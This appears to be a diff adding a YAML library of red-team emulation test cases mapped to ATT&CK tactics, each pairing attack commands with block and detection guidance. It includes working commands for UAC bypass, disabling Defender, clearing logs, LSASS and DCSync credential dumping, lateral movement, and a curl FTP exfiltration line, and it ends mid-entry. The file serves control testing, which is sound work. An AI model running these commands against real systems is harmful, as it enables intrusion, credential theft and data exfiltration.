--- /dev/null
+++ b/h-index-2024/h-index-2024-v1.0.yml
@@ -0,0 +1,1040 @@
+Initial Access:
+- name: Prompt a user with multiple MFA requests
+ description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+ platforms:
+ guidance:
+ block:
+ - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+ detect:
+ - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+ controls:
+ - IdP
+ metadata:
+ id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ tid: T1621
+ tactic: TA0006
+ x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ isv: 1
+- name: Attachment - Macro
+ description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+ platforms:
+ guidance:
+ - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ isv: 1
+- name: Attachment - ISO
+ description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+ platforms:
+ guidance:
+ - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ isv: 1
+- name: Link - Zipped DLL via sharing
+ description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service
+ platforms:
+ guidance:
+ - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+ tid: T1566.002
+ tactic: TA0001
+ x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+ isv: 1
+- name: Suspicious external employee login
+ description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+ platforms:
+ guidance:
+ block:
+ - Suspicious logins originating from select geolocations are blocked
+ detect:
+ - Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+ controls:
+ - SIEM
+ - IdP
+ metadata:
+ id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+ tid: T1078
+ tactic: TA0001
+ x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+ isv: 1
+- name: Suspicious service use
+ description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+ platforms:
+ guidance:
+ block:
+ - ''
+ detect:
+ - Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+ controls:
+ - SIEM
+ metadata:
+ id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ tid: T1078
+ tactic: TA0001
+ x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ isv: 1
+Defense Evasion:
+- name: Load known-abusable kernel driver
+ description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+ platforms:
+ - windows
+ guidance:
+ - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+ block:
+ - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+ - https://www.loldrivers.io/
+ - Anomalous driver load blocked by endpoint security tool
+ detect:
+ - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+ controls:
+ - Hardening
+ - Endpoint Protection
+ metadata:
+ id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ tid: T1014
+ tactic: TA0005
+ x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ isv: 1
+- name: DLL execution using Rundll32
+ description: Execute a malicious DLL's function directly using rundll32
+ platforms:
+ - windows
+ guidance:
+ - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Payload on disk deleted/quarantined by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ tid: T1218.011
+ tactic: TA0005
+ x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ isv: 1
+- name: Bypass User Account Control (UAC) via fodhelper
+ description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+ platforms:
+ - windows
+ guidance:
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+ - cmd> c:\windows\system32\fodhelper.exe
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+ controls:
+ - SIEM
+ - Endpoint Protection
+ metadata:
+ id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ tid: T1548.002
+ tactic: TA0004
+ x_references:
+ - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+ x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ isv: 1
+- name: Clear Windows Event Log entries
+ description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+ platforms:
+ - windows
+ guidance:
+ - CMD> wevtutil clear-log Security
+ - CMD> wevtutil clear-log Application
+ - CMD> wevtutil clear-log System
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ tid: T1070.001
+ tactic: TA0005
+ x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ isv: 1
+- name: Sideload a DLL into a legitimate application
+ description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+ platforms:
+ - windows
+ guidance:
+ - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 2496e250-5757-482f-9661-daea872395ae
+ tid: T1574.002
+ tactic: TA0005
+ x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+ isv: 1
+- name: Disable Windows Defender via PowerShell
+ description: Use PowerShell's Set-MpPreference to disable Windows Defender
+ platforms:
+ - windows
+ guidance:
+ - PS> Set-MpPreference -DisableBehaviorMonitoring $true
+ - PS> Set-MpPreference -DisableRealtimeMonitoring $true
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ tid: T1562.001
+ tactic: TA0005
+ x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ isv: 1
+- name: Modify identity policy in IdP
+ description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+ platforms:
+ guidance:
+ block:
+ - ''
+ detect:
+ - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+ controls:
+ - SIEM
+ metadata:
+ id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ tid: T1484
+ tactic: TA0003
+ x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ isv: 1
+Collection:
+- name: Screen Capture
+ description: Capture an image of the user's screen
+ platforms:
+ guidance:
+ - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ tid: T1113
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+ x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ isv: 1
+- name: Keylogger
+ description: Log user keystrokes
+ platforms:
+ - windows
+ guidance:
+ - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ tid: T1056.001
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+ x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ isv: 1
+Discovery:
+- name: Domain Controller discovery via nltest
+ description: Use nltest.exe to identify domain controllers in the domain
+ platforms:
+ - windows
+ guidance:
+ - cmd> nltest.exe /dclist:{{ domain }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ tid: T1018
+ tactic: TA0007
+ x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ isv: 1
+- name: Domain trust discovery via nltest
+ description: Identify domain trust relationships using nltest.exe
+ platforms:
+ - windows
+ guidance:
+ - cmd> nltest.exe /domain_trusts /all_trusts
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ tid: T1482
+ tactic: TA0007
+ x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ isv: 1
+- name: Enumerate domain groups and users using net
+ description: Enumerate domain users and domain groups using the builtin net.exe
+ platforms:
+ - windows
+ guidance:
+ - cmd> net user /domain
+ - cmd> net group /domain
+ - cmd> net group "Domain Admins" /domain
+ - cmd> net group "Domain Computers" /domain
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ tid: T1087.002
+ tactic: TA0007
+ x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ isv: 1
+- name: BloodHound DC enumeration
+ description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+ platforms:
+ guidance:
+ - cmd> SharpHound.exe -c DcOnly
+ block:
+ - ''
+ detect:
+ - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+ - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+ - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ metadata:
+ id: 672f8861-c914-4f58-b861-5107ce19f61c
+ tid: T1087.002
+ tactic: TA0007
+ x_tools:
+ - https://github.com/BloodHoundAD/SharpHound
+ x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+ isv: 1
+- name: Internal network scan using Net Scan
+ description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+ platforms:
+ - windows
+ guidance:
+ - cmd> {{ netscan_binary }}
+ block:
+ - Network security controls block source generating a large volume of connection requests
+ - Block the installation and use of unapproved third-party utilities via application control software
+ detect:
+ - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+ controls:
+ - ID/PS
+ - Firewall
+ - SIEM
+ - Application Control
+ metadata:
+ id: 3f120c23-78c0-462f-808f-38ef4f607233
+ tid: T1046
+ tactic: TA0007
+ x_tools:
+ - https://www.softperfect.com/products/networkscanner/
+ x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+ isv: 1
+Command and Control:
+- name: HTTP C2 over tcp/80
+ description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+ platforms:
+ guidance:
+ block:
+ - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+ detect:
+ - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ isv: 1
+- name: HTTPS C2 over tcp/443
+ description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+ platforms:
+ guidance:
+ block:
+ - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+ detect:
+ - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ isv: 1
+- name: Access via remote assistance tool
+ description: Establish connection to system using a legitimate remote assistance application
+ platforms:
+ guidance:
+ block:
+ - Block the installation and use of unapproved third-party utilities via application control software
+ - Connections to known remote access service domains/IPs are blocked
+ - Remote access connection attempts originating from users outside of the tenant are blocked
+ detect:
+ - Connections to known remote access service domains/IPs are detected
+ controls:
+ - Application Control
+ - ID/PS
+ - Firewall
+ metadata:
+ id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ tid: T1219
+ tactic: TA0011
+ x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ isv: 1
+- name: Remote tool download over HTTP
+ description: Download a tool from a public hosting location onto the victim system
+ platforms:
+ guidance:
+ block:
+ - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+ detect:
+ - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ tid: T1105
+ tactic: TA0011
+ x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ isv: 1
+Credential Access:
+- name: Extract domain user credentials via replication
+ description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+ platforms:
+ - windows
+ guidance:
+ - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+ block:
+ - ''
+ detect:
+ - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. 
either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}") + - https://blog.blacklanternsecurity.com/p/detecting-dcsync + controls: + - SIEM + - Identity Threat Protection + metadata: + id: d6dd145b-c7ae-4f79-bc07-179a012a7a07 + tid: T1003.006 + tactic: TA0006 + x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07 + isv: 1 +- name: Extract Logonpasswords via Nanodump + description: Use nanodump to extract credentials from LSASS process memory + platforms: + - windows + guidance: + - cmd> nanodump.exe --duplicate -w {{ out_file }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable Credential Guard to prevent traditional process dumping of LSASS + detect: + - Suspicious process execution/behavior detected by endpoint security tool + controls: + - Endpoint Protection + - Hardening + metadata: + id: 8eeb3c12-dc2e-4791-aff5-e81501312886 + tid: T1003.001 + tactic: TA0006 + x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886 + isv: 1 +- name: Dump LSASS memory using Sysinternals ProcDump + description: Use ProcDump from Sysinternals to dump LSASS process memory + platforms: + - windows + guidance: + - CMD> procdump -ma lsass.exe dump + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable Credential Guard to prevent traditional process dumping of LSASS + - Block the installation and use of unapproved third-party utilities via application control software + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + controls: + - SIEM + - Endpoint Protection + - Hardening + - Application Control + metadata: + id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1 + tid: T1003.001 + tactic: TA0006 + x_tools: + - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump + x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1 + isv: 1 +- name: Dump LSASS memory 
using builtin comsvcs.dll + description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk + platforms: + - windows + guidance: + - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable Credential Guard to prevent traditional process dumping of LSASS + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + controls: + - SIEM + - Endpoint Protection + - Hardening + metadata: + id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8 + tid: T1003.001 + tactic: TA0006 + x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8 + isv: 1 +- name: Extract browser cookies + description: Extract cookie information from the user's browser + platforms: + - windows + guidance: + - cmd> SharpChrome.exe cookies + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM + controls: + - Endpoint Protection + - SIEM + metadata: + id: 95790889-fb7d-42af-a221-3535e4197cde + tid: T1555.003 + tactic: TA0006 + x_tools: + - https://github.com/GhostPack/SharpDPAPI + x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde + isv: 1 +- name: Volumetric Kerberoasting + description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set + platforms: + guidance: + - cmd> Rubeus.exe kerberoast + block: + - '' + detect: + - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. 
Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).' + controls: + - SIEM + - Identity Threat Protection + metadata: + id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7 + tid: T1558.003 + tactic: TA0006 + x_tools: + - https://github.com/GhostPack/Rubeus + x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7 + isv: 1 +- name: Enabled WDigest via Registry + description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory + platforms: + - windows + guidance: + - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f + block: + - Suspicious Registry modification blocked by endpoint security tool + detect: + - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). 
+ controls: + - Endpoint Protection + - SIEM + metadata: + id: 9a66066b-997b-4ff1-8b4b-c14d982df861 + tid: T1112 + tactic: TA0005 + x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861 + isv: 1 +- name: Register Security Service Provider (SSP) in LSASS + description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS. + platforms: + - windows + guidance: + - shell> {{ ssp_loader }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS + detect: + - For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32. + - For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads + controls: + - Endpoint Protection + metadata: + id: 6efcb4c5-d740-41ce-a0dc-b63734813928 + tid: T1547.005 + tactic: TA0006 + x_references: + - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot + x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928 + isv: 1 +Lateral Movement: +- name: Lateral Movement via WMI + description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system + platforms: + - windows + guidance: + - CMD> wmic /node:"{{ target }}" process call create "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns 
detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + tid: T1021.003 + tactic: TA0008 + x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + isv: 1 +- name: Lateral Movement via PsExec + description: Move to another system by creating a service remotely via Sysinternals PsExec + platforms: + - windows + guidance: + - CMD> psexec -s \{{ target }} {{ command }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Host-based firewalls prevent direct communications over common ports/protocols + - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + tid: T1021.002 + tactic: TA0008 + x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + isv: 1 +- name: Lateral Movement via RDP + description: Perform an interactive logons to a Windows system via RDP + platforms: + - windows + guidance: + - CMD> mstsc /v:{{ target }} + block: + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 
4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + tid: T1021.001 + tactic: TA0008 + x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + isv: 1 +- name: Remote .exe copy + description: Copy an .exe payload to a temp folder on the remote target + platforms: + guidance: + - cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }} + block: + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - Antivirus + - SIEM + metadata: + id: b74ff4c5-eebf-466b-af85-341b19c4c748 + tid: T1570 + tactic: TA0008 + x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748 + isv: 1 +Exfiltration: +- name: Extract data to cloud storage service + description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box + platforms: + guidance: + block: + - Sensitive data sent over the network is blocked by network DLP tool + - Network security tool detects connection to domain based on category from proxy or DNS + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + tid: T1567.002 + tactic: TA0010 + x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + isv: 1 +- name: Extract sensitive data over FTP + description: Exfiltrate data from the internal network to an external system via FTP + platforms: + guidance: + - 
https://dlptest.com/ftp-test/ + - shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }} + block: + - Outbound connections over FTP are blocked by network security configurations + - Sensitive data sent over the network is blocked by network DLP tool + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - DLP + - Firewall + metadata: + id: 11b7a86e-4596-4df9-a2a9-705096756d28 + tid: T1048.003 + tactic: TA0010 + x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28 + isv: 1 +- name: Extract sensitive data over HTTP + description: Extract data from the network over HTTP tcp/80 to an external host or IP. + platforms: + guidance: + - http://dlptest.com/http-post/ + block: + - Sensitive data sent over the network is blocked by network DLP tool + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + tid: T1048.003 + tactic: TA0010 + x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + isv: 1 +- name: Extract sensitive data over HTTP C2 + description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP + platforms: + guidance: + - implant> download {{ file }} + block: + - Sensitive data sent over the network is blocked by network DLP tool + - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool + detect: + - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + tid: T1041 + tactic: TA0010 + x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + isv: 1 +Impact: +- name: Encrypt a large amount of files + description: Encrypt a large amount of files on the endpoint to simulate ransomware + platforms: + guidance: + - cmd> coldcryptor.exe run {{ extension }} + block: + - 
